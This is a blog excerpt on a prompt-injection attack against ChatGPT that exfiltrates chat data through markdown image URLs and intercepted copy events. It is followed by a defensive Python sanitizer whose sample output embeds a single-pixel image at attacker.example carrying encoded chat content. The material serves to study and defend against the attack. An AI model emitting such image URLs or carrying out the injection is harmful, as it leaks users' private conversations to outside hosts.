New prompt injection attack on ChatGPT web version. Markdown images can steal your chat data
Simon Willison's Weblog (simonwillison.net)
An ingenious new prompt injection / data exfiltration vector from Roman Samoilenko, based on the observation that ChatGPT can render markdown images in a way that can exfiltrate data to the image hosting server by embedding it in the image URL. Roman uses a single pixel image for that, and combines it with a trick where copy events on a website are intercepted and prompt …
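A defender-side check for the vector described above, written as an added example (it is not code from the post or from Roman Samoilenko): before model output is rendered, markdown image references whose host is outside an allowlist, or whose URL carries query data, are stripped and reported. The allowlist, the URL length limit and the sample model output are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed allowlist of hosts the renderer may fetch images from (assumption).
ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}
MAX_URL_LEN = 200  # longer image URLs are treated as data carriers (assumption)

# Matches ![alt](url) and ![alt](url "title") in markdown.
IMAGE_RE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)(?:\s+\"[^\"]*\")?\)")


def classify_image_url(url: str) -> str:
    """Return 'allow' or a 'blocked: ...' reason for a markdown image URL."""
    parsed = urlparse(url)
    if parsed.scheme != "https":
        return "blocked: non-https scheme"
    host = (parsed.hostname or "").lower()
    if host not in ALLOWED_IMAGE_HOSTS:
        return "blocked: host not allowlisted"
    # Even an allowlisted host must not receive chat content smuggled in the URL.
    if parsed.query or len(url) > MAX_URL_LEN:
        return "blocked: URL carries query data"
    return "allow"


def sanitize_markdown(text: str):
    """Strip disallowed image references; return (clean_markdown, findings)."""
    findings = []

    def repl(match):
        alt, url = match.group(1), match.group(2)
        verdict = classify_image_url(url)
        if verdict == "allow":
            return match.group(0)
        findings.append((url, verdict))
        return f"[image removed: {alt.strip() or 'untitled'}]"

    return IMAGE_RE.sub(repl, text), findings


# Constructed sample of model output with an injected single-pixel image whose
# query string carries encoded chat content, next to a legitimate image.
SAMPLE_OUTPUT = (
    "Here is the summary you asked for.\n"
    "![ ](https://attacker.example/p.png?d=Q29uZmlkZW50aWFsIGNoYXQ)\n"
    "![diagram](https://cdn.example.com/arch.png)\n"
)

if __name__ == "__main__":
    clean, found = sanitize_markdown(SAMPLE_OUTPUT)
    print(clean)
    for url, reason in found:
        print(f"{reason}: {url}")
```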